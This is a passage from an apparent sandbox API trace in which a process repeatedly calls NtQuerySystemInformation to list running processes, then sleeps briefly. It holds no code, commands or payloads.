ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.188] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0207.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0207.719] 